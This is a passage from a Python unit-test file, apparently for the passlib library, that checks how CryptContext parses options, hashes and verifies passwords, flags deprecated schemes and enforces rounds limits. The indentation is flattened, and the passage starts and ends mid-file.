# update flag - tested by update() method tests
# encoding keyword - tested by from_string() & from_path()
# section keyword - tested by from_string() & from_path()
# test load empty
ctx = CryptContext(**self.sample_1_dict)
ctx.load({}, update=True)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# multiple loads should clear the state
ctx = CryptContext()
ctx.load(self.sample_1_dict)
ctx.load(self.sample_2_dict)
self.assertEqual(ctx.to_dict(), self.sample_2_dict)
def test_11_load_rollback(self):
"""test load() errors restore old state"""
# create initial context
cc = CryptContext(["des_crypt", "sha256_crypt"],
sha256_crypt__default_rounds=5000,
all__vary_rounds=0.1,
)
result = cc.to_string()
# do an update operation that should fail during parsing
# XXX: not sure what the right error type is here.
self.assertRaises(TypeError, cc.update, too__many__key__parts=True)
self.assertEqual(cc.to_string(), result)
# do an update operation that should fail during extraction
# FIXME: this isn't failing even in broken case, need to figure out
# way to ensure some keys come after this one.
self.assertRaises(KeyError, cc.update, fake_context_option=True)
self.assertEqual(cc.to_string(), result)
# do an update operation that should fail during compilation
self.assertRaises(ValueError, cc.update, sha256_crypt__min_rounds=10000)
self.assertEqual(cc.to_string(), result)
def test_12_update(self):
"""test update() method"""
# empty overlay
ctx = CryptContext(**self.sample_1_dict)
ctx.update()
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
# test basic overlay
ctx = CryptContext(**self.sample_1_dict)
ctx.update(**self.sample_2_dict)
self.assertEqual(ctx.to_dict(), self.sample_12_dict)
# ... and again
ctx.update(**self.sample_3_dict)
self.assertEqual(ctx.to_dict(), self.sample_123_dict)
# overlay w/ dict arg
ctx = CryptContext(**self.sample_1_dict)
ctx.update(self.sample_2_dict)
self.assertEqual(ctx.to_dict(), self.sample_12_dict)
# overlay w/ string
ctx = CryptContext(**self.sample_1_dict)
ctx.update(self.sample_2_unicode)
self.assertEqual(ctx.to_dict(), self.sample_12_dict)
# too many args
self.assertRaises(TypeError, ctx.update, {}, {})
self.assertRaises(TypeError, ctx.update, {}, schemes=['des_crypt'])
# wrong arg type
self.assertRaises(TypeError, ctx.update, None)
#===================================================================
# option parsing
#===================================================================
def test_20_options(self):
"""test basic option parsing"""
def parse(**kwds):
return CryptContext(**kwds).to_dict()
#
# common option parsing tests
#
# test keys with blank fields are rejected
# blank option
self.assertRaises(TypeError, CryptContext, __=0.1)
self.assertRaises(TypeError, CryptContext, default__scheme__='x')
# blank scheme
self.assertRaises(TypeError, CryptContext, __option='x')
self.assertRaises(TypeError, CryptContext, default____option='x')
# blank category
self.assertRaises(TypeError, CryptContext, __scheme__option='x')
# test keys with too many field are rejected
self.assertRaises(TypeError, CryptContext,
category__scheme__option__invalid = 30000)
# keys with mixed separators should be handled correctly.
# (testing the parsed data, not to_dict(), since re-rendering hid the original bug)
self.assertRaises(KeyError, parse,
**{"admin.context__schemes":"md5_crypt"})
ctx = CryptContext(**{"schemes":"md5_crypt,des_crypt",
"admin.context__default":"des_crypt"})
self.assertEqual(ctx.default_scheme("admin"), "des_crypt")
#
# context option -specific tests
#
# test context option key parsing
result = dict(default="md5_crypt")
self.assertEqual(parse(default="md5_crypt"), result)
self.assertEqual(parse(context__default="md5_crypt"), result)
self.assertEqual(parse(default__context__default="md5_crypt"), result)
self.assertEqual(parse(**{"context.default":"md5_crypt"}), result)
self.assertEqual(parse(**{"default.context.default":"md5_crypt"}), result)
# test context option key parsing w/ category
result = dict(admin__context__default="md5_crypt")
self.assertEqual(parse(admin__context__default="md5_crypt"), result)
self.assertEqual(parse(**{"admin.context.default":"md5_crypt"}), result)
#
# hash option -specific tests
#
# test hash option key parsing
result = dict(all__vary_rounds=0.1)
self.assertEqual(parse(all__vary_rounds=0.1), result)
self.assertEqual(parse(default__all__vary_rounds=0.1), result)
self.assertEqual(parse(**{"all.vary_rounds":0.1}), result)
self.assertEqual(parse(**{"default.all.vary_rounds":0.1}), result)
# test hash option key parsing w/ category
result = dict(admin__all__vary_rounds=0.1)
self.assertEqual(parse(admin__all__vary_rounds=0.1), result)
self.assertEqual(parse(**{"admin.all.vary_rounds":0.1}), result)
# settings not allowed if not in hash.settings_kwds
ctx = CryptContext(["phpass", "md5_crypt"], phpass__ident="P")
self.assertRaises(KeyError, ctx.copy, md5_crypt__ident="P")
# hash options 'salt' and 'rounds' not allowed
self.assertRaises(KeyError, CryptContext, schemes=["des_crypt"],
des_crypt__salt="xx")
self.assertRaises(KeyError, CryptContext, schemes=["des_crypt"],
all__salt="xx")
def test_21_schemes(self):
"""test 'schemes' context option parsing"""
# schemes can be empty
cc = CryptContext(schemes=None)
self.assertEqual(cc.schemes(), ())
# schemes can be list of names
cc = CryptContext(schemes=["des_crypt", "md5_crypt"])
self.assertEqual(cc.schemes(), ("des_crypt", "md5_crypt"))
# schemes can be comma-sep string
cc = CryptContext(schemes=" des_crypt, md5_crypt, ")
self.assertEqual(cc.schemes(), ("des_crypt", "md5_crypt"))
# schemes can be list of handlers
cc = CryptContext(schemes=[hash.des_crypt, hash.md5_crypt])
self.assertEqual(cc.schemes(), ("des_crypt", "md5_crypt"))
# scheme must be name or handler
self.assertRaises(TypeError, CryptContext, schemes=[uh.StaticHandler])
# handlers must have a name
class nameless(uh.StaticHandler):
name = None
self.assertRaises(ValueError, CryptContext, schemes=[nameless])
# names must be unique
class dummy_1(uh.StaticHandler):
name = 'dummy_1'
self.assertRaises(KeyError, CryptContext, schemes=[dummy_1, dummy_1])
# schemes not allowed per-category
self.assertRaises(KeyError, CryptContext,
admin__context__schemes=["md5_crypt"])
def test_22_deprecated(self):
"""test 'deprecated' context option parsing"""
def getdep(ctx, category=None):
return [name for name in ctx.schemes()
if ctx._is_deprecated_scheme(name, category)]
# no schemes - all deprecated values allowed
cc = CryptContext(deprecated=["md5_crypt"])
cc.update(schemes=["md5_crypt", "des_crypt"])
self.assertEqual(getdep(cc),["md5_crypt"])
# deprecated values allowed if subset of schemes
cc = CryptContext(deprecated=["md5_crypt"], schemes=["md5_crypt", "des_crypt"])
self.assertEqual(getdep(cc), ["md5_crypt"])
# can be handler
# XXX: allow handlers in deprecated list? not for now.
self.assertRaises(TypeError, CryptContext, deprecated=[hash.md5_crypt],
schemes=["md5_crypt", "des_crypt"])
## cc = CryptContext(deprecated=[hash.md5_crypt], schemes=["md5_crypt", "des_crypt"])
## self.assertEqual(getdep(cc), ["md5_crypt"])
# comma sep list
cc = CryptContext(deprecated="md5_crypt,des_crypt", schemes=["md5_crypt", "des_crypt", "sha256_crypt"])
self.assertEqual(getdep(cc), ["md5_crypt", "des_crypt"])
# values outside of schemes not allowed
self.assertRaises(KeyError, CryptContext, schemes=['des_crypt'],
deprecated=['md5_crypt'])
# deprecating ALL schemes should cause ValueError
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt'],
deprecated=['des_crypt'])
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt', 'md5_crypt'],
admin__context__deprecated=['des_crypt', 'md5_crypt'])
# deprecating explicit default scheme should cause ValueError
# ... default listed as deprecated
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt', 'md5_crypt'],
default="md5_crypt",
deprecated="md5_crypt")
# ... global default deprecated per-category
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt', 'md5_crypt'],
default="md5_crypt",
admin__context__deprecated="md5_crypt")
# ... category default deprecated globally
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt', 'md5_crypt'],
admin__context__default="md5_crypt",
deprecated="md5_crypt")
# ... category default deprecated in category
self.assertRaises(ValueError, CryptContext,
schemes=['des_crypt', 'md5_crypt'],
admin__context__default="md5_crypt",
admin__context__deprecated="md5_crypt")
# category deplist should shadow default deplist
CryptContext(
schemes=['des_crypt', 'md5_crypt'],
deprecated="md5_crypt",
admin__context__default="md5_crypt",
admin__context__deprecated=[])
# wrong type
self.assertRaises(TypeError, CryptContext, deprecated=123)
# deprecated per-category
cc = CryptContext(deprecated=["md5_crypt"],
schemes=["md5_crypt", "des_crypt"],
admin__context__deprecated=["des_crypt"],
)
self.assertEqual(getdep(cc), ["md5_crypt"])
self.assertEqual(getdep(cc, "user"), ["md5_crypt"])
self.assertEqual(getdep(cc, "admin"), ["des_crypt"])
# blank per-category deprecated list, shadowing default list
cc = CryptContext(deprecated=["md5_crypt"],
schemes=["md5_crypt", "des_crypt"],
admin__context__deprecated=[],
)
self.assertEqual(getdep(cc), ["md5_crypt"])
self.assertEqual(getdep(cc, "user"), ["md5_crypt"])
self.assertEqual(getdep(cc, "admin"), [])
def test_23_default(self):
"""test 'default' context option parsing"""
# anything allowed if no schemes
self.assertEqual(CryptContext(default="md5_crypt").to_dict(),
dict(default="md5_crypt"))
# default allowed if in scheme list
ctx = CryptContext(default="md5_crypt", schemes=["des_crypt", "md5_crypt"])
self.assertEqual(ctx.default_scheme(), "md5_crypt")
# default can be handler
# XXX: sure we want to allow this ? maybe deprecate in future.
ctx = CryptContext(default=hash.md5_crypt, schemes=["des_crypt", "md5_crypt"])
self.assertEqual(ctx.default_scheme(), "md5_crypt")
# implicit default should be first non-deprecated scheme
ctx = CryptContext(schemes=["des_crypt", "md5_crypt"])
self.assertEqual(ctx.default_scheme(), "des_crypt")
ctx.update(deprecated="des_crypt")
self.assertEqual(ctx.default_scheme(), "md5_crypt")
# error if not in scheme list
self.assertRaises(KeyError, CryptContext, schemes=['des_crypt'],
default='md5_crypt')
# wrong type
self.assertRaises(TypeError, CryptContext, default=1)
# per-category
ctx = CryptContext(default="des_crypt",
schemes=["des_crypt", "md5_crypt"],
admin__context__default="md5_crypt")
self.assertEqual(ctx.default_scheme(), "des_crypt")
self.assertEqual(ctx.default_scheme("user"), "des_crypt")
self.assertEqual(ctx.default_scheme("admin"), "md5_crypt")
def test_24_vary_rounds(self):
"""test 'vary_rounds' hash option parsing"""
def parse(v):
return CryptContext(all__vary_rounds=v).to_dict()['all__vary_rounds']
# floats should be preserved
self.assertEqual(parse(0.1), 0.1)
self.assertEqual(parse('0.1'), 0.1)
# 'xx%' should be converted to float
self.assertEqual(parse('10%'), 0.1)
# ints should be preserved
self.assertEqual(parse(1000), 1000)
self.assertEqual(parse('1000'), 1000)
#===================================================================
# inspection & serialization
#===================================================================
def test_30_schemes(self):
"""test schemes() method"""
# NOTE: also checked under test_21
# test empty
ctx = CryptContext()
self.assertEqual(ctx.schemes(), ())
self.assertEqual(ctx.schemes(resolve=True), ())
# test sample 1
ctx = CryptContext(**self.sample_1_dict)
self.assertEqual(ctx.schemes(), tuple(self.sample_1_schemes))
self.assertEqual(ctx.schemes(resolve=True), tuple(self.sample_1_handlers))
# test sample 2
ctx = CryptContext(**self.sample_2_dict)
self.assertEqual(ctx.schemes(), ())
def test_31_default_scheme(self):
"""test default_scheme() method"""
# NOTE: also checked under test_23
# test empty
ctx = CryptContext()
self.assertRaises(KeyError, ctx.default_scheme)
# test sample 1
ctx = CryptContext(**self.sample_1_dict)
self.assertEqual(ctx.default_scheme(), "md5_crypt")
self.assertEqual(ctx.default_scheme(resolve=True), hash.md5_crypt)
# test sample 2
ctx = CryptContext(**self.sample_2_dict)
self.assertRaises(KeyError, ctx.default_scheme)
# test defaults to first in scheme
ctx = CryptContext(schemes=self.sample_1_schemes)
self.assertEqual(ctx.default_scheme(), "des_crypt")
# categories tested under test_23
def test_32_handler(self):
"""test handler() method"""
# default for empty
ctx = CryptContext()
self.assertRaises(KeyError, ctx.handler)
self.assertRaises(KeyError, ctx.handler, "md5_crypt")
# default for sample 1
ctx = CryptContext(**self.sample_1_dict)
self.assertEqual(ctx.handler(), hash.md5_crypt)
# by name
self.assertEqual(ctx.handler("des_crypt"), hash.des_crypt)
# name not in schemes
self.assertRaises(KeyError, ctx.handler, "mysql323")
# check handler() honors category default
ctx = CryptContext("sha256_crypt,md5_crypt", admin__context__default="md5_crypt")
self.assertEqual(ctx.handler(), hash.sha256_crypt)
self.assertEqual(ctx.handler(category="staff"), hash.sha256_crypt)
self.assertEqual(ctx.handler(category="admin"), hash.md5_crypt)
# test unicode category strings are accepted under py2
if PY2:
self.assertEqual(ctx.handler(category=u("staff")), hash.sha256_crypt)
self.assertEqual(ctx.handler(category=u("admin")), hash.md5_crypt)
def test_33_options(self):
"""test internal _get_record_options() method"""
def options(ctx, scheme, category=None):
return ctx._config._get_record_options_with_flag(scheme, category)[0]
# this checks that (3 schemes, 3 categories) inherit options correctly.
# the 'user' category is not present in the options.
cc4 = CryptContext(
schemes = [ "sha512_crypt", "des_crypt", "bsdi_crypt"],
deprecated = ["sha512_crypt", "des_crypt"],
all__vary_rounds = 0.1,
bsdi_crypt__vary_rounds=0.2,
sha512_crypt__max_rounds = 20000,
admin__context__deprecated = [ "des_crypt", "bsdi_crypt" ],
admin__all__vary_rounds = 0.05,
admin__bsdi_crypt__vary_rounds=0.3,
admin__sha512_crypt__max_rounds = 40000,
)
self.assertEqual(cc4._config.categories, ("admin",))
#
# sha512_crypt
#
self.assertEqual(options(cc4, "sha512_crypt"), dict(
deprecated=True,
vary_rounds=0.1, # inherited from all__
max_rounds=20000,
))
self.assertEqual(options(cc4, "sha512_crypt", "user"), dict(
deprecated=True, # unconfigured category inherits from default
vary_rounds=0.1,
max_rounds=20000,
))
self.assertEqual(options(cc4, "sha512_crypt", "admin"), dict(
# NOT deprecated - context option overridden per-category
vary_rounds=0.05, # global overridden per-category
max_rounds=40000, # overridden per-category
))
#
# des_crypt
#
self.assertEqual(options(cc4, "des_crypt"), dict(
deprecated=True,
vary_rounds=0.1,
))
self.assertEqual(options(cc4, "des_crypt", "user"), dict(
deprecated=True, # unconfigured category inherits from default
vary_rounds=0.1,
))
self.assertEqual(options(cc4, "des_crypt", "admin"), dict(
deprecated=True, # unchanged though overridden
vary_rounds=0.05, # global overridden per-category
))
#
# bsdi_crypt
#
self.assertEqual(options(cc4, "bsdi_crypt"), dict(
vary_rounds=0.2, # overridden from all__vary_rounds
))
self.assertEqual(options(cc4, "bsdi_crypt", "user"), dict(
vary_rounds=0.2, # unconfigured category inherits from default
))
self.assertEqual(options(cc4, "bsdi_crypt", "admin"), dict(
vary_rounds=0.3,
deprecated=True, # deprecation set per-category
))
def test_34_to_dict(self):
"""test to_dict() method"""
# NOTE: this is tested all throughout this test case.
ctx = CryptContext(**self.sample_1_dict)
self.assertEqual(ctx.to_dict(), self.sample_1_dict)
self.assertEqual(ctx.to_dict(resolve=True), self.sample_1_resolved_dict)
def test_35_to_string(self):
"""test to_string() method"""
# create ctx and serialize
ctx = CryptContext(**self.sample_1_dict)
dump = ctx.to_string()
# check ctx->string returns canonical format.
# NOTE: ConfigParser for PY26 and earlier didn't use OrderedDict,
# so to_string() won't get the order correct; skip the comparison there.
if sys.version_info >= (2,7):
self.assertEqual(dump, self.sample_1_unicode)
# check ctx->string->ctx->dict returns original
ctx2 = CryptContext.from_string(dump)
self.assertEqual(ctx2.to_dict(), self.sample_1_dict)
# test section kwd is honored
other = ctx.to_string(section="password-security")
self.assertEqual(other, dump.replace("[passlib]","[password-security]"))
# test unmanaged handler warning
from passlib.tests.test_utils_handlers import UnsaltedHash
ctx3 = CryptContext([UnsaltedHash, "md5_crypt"])
dump = ctx3.to_string()
self.assertRegex(dump, r"# NOTE: the 'unsalted_test_hash' handler\(s\)"
r" are not registered with Passlib")
#===================================================================
# password hash api
#===================================================================
nonstring_vectors = [
(None, {}),
(None, {"scheme": "des_crypt"}),
(1, {}),
((), {}),
]
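# each entry is a (value, kwds) pair; the border-case tests below pass the
# value as a secret or a hash and expect a TypeError for every non-string.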
def test_40_basic(self):
"""test basic encrypt/identify/verify functionality"""
handlers = [hash.md5_crypt, hash.des_crypt, hash.bsdi_crypt]
cc = CryptContext(handlers, bsdi_crypt__default_rounds=5)
# run through handlers
for crypt in handlers:
h = cc.encrypt("test", scheme=crypt.name)
self.assertEqual(cc.identify(h), crypt.name)
self.assertEqual(cc.identify(h, resolve=True), crypt)
self.assertTrue(cc.verify('test', h))
self.assertFalse(cc.verify('notest', h))
# test default
h = cc.encrypt("test")
self.assertEqual(cc.identify(h), "md5_crypt")
# test genhash
h = cc.genhash('secret', cc.genconfig())
self.assertEqual(cc.identify(h), 'md5_crypt')
h = cc.genhash('secret', cc.genconfig(), scheme='md5_crypt')
self.assertEqual(cc.identify(h), 'md5_crypt')
self.assertRaises(ValueError, cc.genhash, 'secret', cc.genconfig(), scheme="des_crypt")
def test_41_genconfig(self):
"""test genconfig() method"""
cc = CryptContext(schemes=["md5_crypt", "phpass"],
phpass__ident="H",
phpass__default_rounds=7,
admin__phpass__ident="P",
)
# uses default scheme
self.assertTrue(cc.genconfig().startswith("$1$"))
# override scheme
self.assertTrue(cc.genconfig(scheme="phpass").startswith("$H$5"))
# category override
self.assertTrue(cc.genconfig(scheme="phpass", category="admin").startswith("$P$5"))
self.assertTrue(cc.genconfig(scheme="phpass", category="staff").startswith("$H$5"))
# override scheme & custom settings
self.assertEqual(
cc.genconfig(scheme="phpass", salt='.'*8, rounds=8, ident='P'),
'$P$6........',
)
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# test unicode category strings are accepted under py2
# this tests basic _get_record() used by encrypt/genhash/verify.
# we have to omit scheme=xxx so the codepath is tested fully
if PY2:
c2 = cc.copy(default="phpass")
self.assertTrue(c2.genconfig(category=u("admin")).startswith("$P$5"))
self.assertTrue(c2.genconfig(category=u("staff")).startswith("$H$5"))
# throws error without schemes
self.assertRaises(KeyError, CryptContext().genconfig)
self.assertRaises(KeyError, CryptContext().genconfig, scheme='md5_crypt')
# bad scheme values
self.assertRaises(KeyError, cc.genconfig, scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.genconfig, scheme=1, category='staff')
self.assertRaises(TypeError, cc.genconfig, scheme=1)
# bad category values
self.assertRaises(TypeError, cc.genconfig, category=1)
def test_42_genhash(self):
"""test genhash() method"""
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# rejects non-string secrets
cc = CryptContext(["des_crypt"])
hash = cc.encrypt('stub')
for secret, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.genhash, secret, hash, **kwds)
# rejects non-string hashes
cc = CryptContext(["des_crypt"])
for hash, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.genhash, 'secret', hash, **kwds)
# .. but should accept None if default scheme lacks config string
cc = CryptContext(["mysql323"])
self.assertIsInstance(cc.genhash("stub", None), str)
# throws error without schemes
self.assertRaises(KeyError, CryptContext().genhash, 'secret', 'hash')
# bad scheme values
self.assertRaises(KeyError, cc.genhash, 'secret', hash, scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.genhash, 'secret', hash, scheme=1)
# bad category values
self.assertRaises(TypeError, cc.genhash, 'secret', hash, category=1)
def test_43_encrypt(self):
"""test encrypt() method"""
cc = CryptContext(**self.sample_4_dict)
# hash specific settings
self.assertEqual(
cc.encrypt("password", scheme="phpass", salt='.'*8),
'$H$5........De04R5Egz0aq8Tf.1eVhY/',
)
self.assertEqual(
cc.encrypt("password", scheme="phpass", salt='.'*8, ident="P"),
'$P$5........De04R5Egz0aq8Tf.1eVhY/',
)
# NOTE: more thorough job of rounds limits done below.
# min rounds
with self.assertWarningList(PasslibConfigWarning):
self.assertEqual(
cc.encrypt("password", rounds=1999, salt="nacl"),
'$5$rounds=2000$nacl$9/lTZ5nrfPuz8vphznnmHuDGFuvjSNvOEDsGmGfsS97',
)
with self.assertWarningList([]):
self.assertEqual(
cc.encrypt("password", rounds=2001, salt="nacl"),
'$5$rounds=2001$nacl$8PdeoPL4aXQnJ0woHhqgIw/efyfCKC2WHneOpnvF.31'
)
# NOTE: max rounds, etc tested in genconfig()
# make default > max throws error if attempted
self.assertRaises(ValueError, cc.copy,
sha256_crypt__default_rounds=4000)
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# rejects non-string secrets
cc = CryptContext(["des_crypt"])
for secret, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.encrypt, secret, **kwds)
# throws error without schemes
self.assertRaises(KeyError, CryptContext().encrypt, 'secret')
# bad scheme values
self.assertRaises(KeyError, cc.encrypt, 'secret', scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.encrypt, 'secret', scheme=1)
# bad category values
self.assertRaises(TypeError, cc.encrypt, 'secret', category=1)
def test_44_identify(self):
"""test identify() border cases"""
handlers = ["md5_crypt", "des_crypt", "bsdi_crypt"]
cc = CryptContext(handlers, bsdi_crypt__default_rounds=5)
# check unknown hash
self.assertEqual(cc.identify('$9$232323123$1287319827'), None)
self.assertRaises(ValueError, cc.identify, '$9$232323123$1287319827', required=True)
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# rejects non-string hashes
cc = CryptContext(["des_crypt"])
for hash, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.identify, hash, **kwds)
# throws error without schemes
cc = CryptContext()
self.assertIs(cc.identify('hash'), None)
self.assertRaises(KeyError, cc.identify, 'hash', required=True)
# bad category values
self.assertRaises(TypeError, cc.identify, None, category=1)
def test_45_verify(self):
"""test verify() scheme kwd"""
handlers = ["md5_crypt", "des_crypt", "bsdi_crypt"]
cc = CryptContext(handlers, bsdi_crypt__default_rounds=5)
h = hash.md5_crypt.encrypt("test")
# check base verify
self.assertTrue(cc.verify("test", h))
self.assertTrue(not cc.verify("notest", h))
# check verify using right alg
self.assertTrue(cc.verify('test', h, scheme='md5_crypt'))
self.assertTrue(not cc.verify('notest', h, scheme='md5_crypt'))
# check verify using wrong alg
self.assertRaises(ValueError, cc.verify, 'test', h, scheme='bsdi_crypt')
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# unknown hash should throw error
self.assertRaises(ValueError, cc.verify, 'stub', '$6$232323123$1287319827')
# rejects non-string secrets
cc = CryptContext(["des_crypt"])
h = refhash = cc.encrypt('stub')
for secret, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.verify, secret, h, **kwds)
# rejects non-string hashes
cc = CryptContext(["des_crypt"])
for h, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.verify, 'secret', h, **kwds)
# throws error without schemes
self.assertRaises(KeyError, CryptContext().verify, 'secret', 'hash')
# bad scheme values
self.assertRaises(KeyError, cc.verify, 'secret', refhash, scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.verify, 'secret', refhash, scheme=1)
# bad category values
self.assertRaises(TypeError, cc.verify, 'secret', refhash, category=1)
def test_46_needs_update(self):
"""test needs_update() method"""
cc = CryptContext(**self.sample_4_dict)
# check deprecated scheme
self.assertTrue(cc.needs_update('9XXD4trGYeGJA'))
self.assertFalse(cc.needs_update('$1$J8HC2RCr$HcmM.7NxB2weSvlw2FgzU0'))
# check min rounds
self.assertTrue(cc.needs_update('$5$rounds=1999$jD81UCoo.zI.UETs$Y7qSTQ6mTiU9qZB4fRr43wRgQq4V.5AAf7F97Pzxey/'))
self.assertFalse(cc.needs_update('$5$rounds=2000$228SSRje04cnNCaQ$YGV4RYu.5sNiBvorQDlO0WWQjyJVGKBcJXz3OtyQ2u8'))
# check max rounds
self.assertFalse(cc.needs_update('$5$rounds=3000$fS9iazEwTKi7QPW4$VasgBC8FqlOvD7x2HhABaMXCTh9jwHclPA9j5YQdns.'))
self.assertTrue(cc.needs_update('$5$rounds=3001$QlFHHifXvpFX4PLs$/0ekt7lSs/lOikSerQ0M/1porEHxYq7W/2hdFpxA3fA'))
#--------------------------------------------------------------
# test _bind_needs_update() framework
#--------------------------------------------------------------
bind_state = []
check_state = []
class dummy(uh.StaticHandler):
name = 'dummy'
_hash_prefix = '@'
@classmethod
def _bind_needs_update(cls, **settings):
bind_state.append(settings)
return cls._needs_update
@classmethod
def _needs_update(cls, hash, secret):
check_state.append((hash,secret))
return secret == "nu"
def _calc_checksum(self, secret):
from hashlib import md5
if isinstance(secret, unicode):
secret = secret.encode("utf-8")
return str_to_uascii(md5(secret).hexdigest())
# creating context should call bind function w/ settings
ctx = CryptContext([dummy])
self.assertEqual(bind_state, [{}])
# calling needs_update should query callback
hash = refhash = dummy.encrypt("test")
self.assertFalse(ctx.needs_update(hash))
self.assertEqual(check_state, [(hash,None)])
del check_state[:]
# now with a password
self.assertFalse(ctx.needs_update(hash, secret='bob'))
self.assertEqual(check_state, [(hash,'bob')])
del check_state[:]
# now when it returns True
self.assertTrue(ctx.needs_update(hash, secret='nu'))
self.assertEqual(check_state, [(hash,'nu')])
del check_state[:]
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# rejects non-string hashes
cc = CryptContext(["des_crypt"])
for hash, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.needs_update, hash, **kwds)
# throws error without schemes
self.assertRaises(KeyError, CryptContext().needs_update, 'hash')
# bad scheme values
self.assertRaises(KeyError, cc.needs_update, refhash, scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.needs_update, refhash, scheme=1)
# bad category values
self.assertRaises(TypeError, cc.needs_update, refhash, category=1)
def test_47_verify_and_update(self):
"""test verify_and_update()"""
cc = CryptContext(**self.sample_4_dict)
# create some hashes
h1 = cc.encrypt("password", scheme="des_crypt")
h2 = cc.encrypt("password", scheme="sha256_crypt")
# check bad password, deprecated hash
ok, new_hash = cc.verify_and_update("wrongpass", h1)
self.assertFalse(ok)
self.assertIs(new_hash, None)
# check bad password, good hash
ok, new_hash = cc.verify_and_update("wrongpass", h2)
self.assertFalse(ok)
self.assertIs(new_hash, None)
# check right password, deprecated hash
ok, new_hash = cc.verify_and_update("password", h1)
self.assertTrue(ok)
self.assertEqual(cc.identify(new_hash), "sha256_crypt")
# check right password, good hash
ok, new_hash = cc.verify_and_update("password", h2)
self.assertTrue(ok)
self.assertIs(new_hash, None)
#--------------------------------------------------------------
# border cases
#--------------------------------------------------------------
# rejects non-string secrets
cc = CryptContext(["des_crypt"])
hash = refhash = cc.encrypt('stub')
for secret, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.verify_and_update, secret, hash, **kwds)
# rejects non-string hashes
cc = CryptContext(["des_crypt"])
for hash, kwds in self.nonstring_vectors:
self.assertRaises(TypeError, cc.verify_and_update, 'secret', hash, **kwds)
# throws error without schemes
self.assertRaises(KeyError, CryptContext().verify_and_update, 'secret', 'hash')
# bad scheme values
self.assertRaises(KeyError, cc.verify_and_update, 'secret', refhash, scheme="fake") # XXX: should this be ValueError?
self.assertRaises(TypeError, cc.verify_and_update, 'secret', refhash, scheme=1)
# bad category values
self.assertRaises(TypeError, cc.verify_and_update, 'secret', refhash, category=1)
#===================================================================
# rounds options
#===================================================================
# NOTE: the following tests check how _CryptRecord handles
# the min/max/default/vary_rounds options, via the output of
# genconfig(). it's assumed encrypt() takes the same codepath.
def test_50_rounds_limits(self):
"""test rounds limits"""
cc = CryptContext(schemes=["sha256_crypt"],
all__min_rounds=2000,
all__max_rounds=3000,
all__default_rounds=2500,
)
#--------------------------------------------------
# min_rounds
#--------------------------------------------------
# set below handler minimum
with self.assertWarningList([PasslibConfigWarning]*2):
c2 = cc.copy(all__min_rounds=500, all__max_rounds=None,
all__default_rounds=500)
self.assertEqual(c2.genconfig(salt="nacl"), "$5$rounds=1000$nacl$")
# below policy minimum
with self.assertWarningList(PasslibConfigWarning):
self.assertEqual(
cc.genconfig(rounds=1999, salt="nacl"),
'$5$rounds=2000$nacl$',
)
# equal to policy minimum
self.assertEqual(
cc.genconfig(rounds=2000, salt="nacl"),
'$5$rounds=2000$nacl$',
)
# above policy minimum
self.assertEqual(
cc.genconfig(rounds=2001, salt="nacl"),
'$5$rounds=2001$nacl$'
)
#--------------------------------------------------
# max rounds
#--------------------------------------------------
# set above handler max
with self.assertWarningList([PasslibConfigWarning]*2):
c2 = cc.copy(all__max_rounds=int(1e9)+500, all__min_rounds=None,
all__default_rounds=int(1e9)+500)
self.assertEqual(c2.genconfig(salt="nacl"),
"$5$rounds=999999999$nacl$")
# above policy max
with self.assertWarningList(PasslibConfigWarning):
self.assertEqual(
cc.genconfig(rounds=3001, salt="nacl"),
'$5$rounds=3000$nacl$'
)
# equal policy max
self.assertEqual(
cc.genconfig(rounds=3000, salt="nacl"),
'$5$rounds=3000$nacl$'
)
# below policy max
self.assertEqual(
cc.genconfig(rounds=2999, salt="nacl"),
'$5$rounds=2999$nacl$',
)
#--------------------------------------------------
# default_rounds
#--------------------------------------------------
# explicit default rounds
self.assertEqual(cc.genconfig(salt="nacl"), '$5$rounds=2500$nacl$')
# fallback default rounds - use handler's
df = hash.sha256_crypt.default_rounds
c2 = cc.copy(all__default_rounds=None, all__max_rounds=df<<1)
self.assertEqual(c2.genconfig(salt="nacl"),
'$5$rounds=%d$nacl$' % df)
# fallback default rounds - use handler's, but clipped to max rounds
c2 = cc.copy(all__default_rounds=None, all__max_rounds=3000)
self.assertEqual(c2.genconfig(salt="nacl"), '$5$rounds=3000$nacl$')
# TODO: test default falls back to mx / mn if handler has no default.
# default rounds - out of bounds
self.assertRaises(ValueError, cc.copy, all__default_rounds=1999)
cc.copy(all__default_rounds=2000)
cc.copy(all__default_rounds=3000)
self.assertRaises(ValueError, cc.copy, all__default_rounds=3001)
#--------------------------------------------------
# border cases
#--------------------------------------------------
# invalid min/max bounds
c2 = CryptContext(schemes=["sha256_crypt"])
self.assertRaises(ValueError, c2.copy, all__min_rounds=-1)
self.assertRaises(ValueError, c2.copy, all__max_rounds=-1)
self.assertRaises(ValueError, c2.copy, all__min_rounds=2000,
all__max_rounds=1999)
# test bad values
self.assertRaises(ValueError, CryptContext, all__min_rounds='x')
self.assertRaises(ValueError, CryptContext, all__max_rounds='x')
self.assertRaises(ValueError, CryptContext, all__vary_rounds='x')
self.assertRaises(ValueError, CryptContext, all__default_rounds='x')
# test bad types rejected
bad = NotImplemented
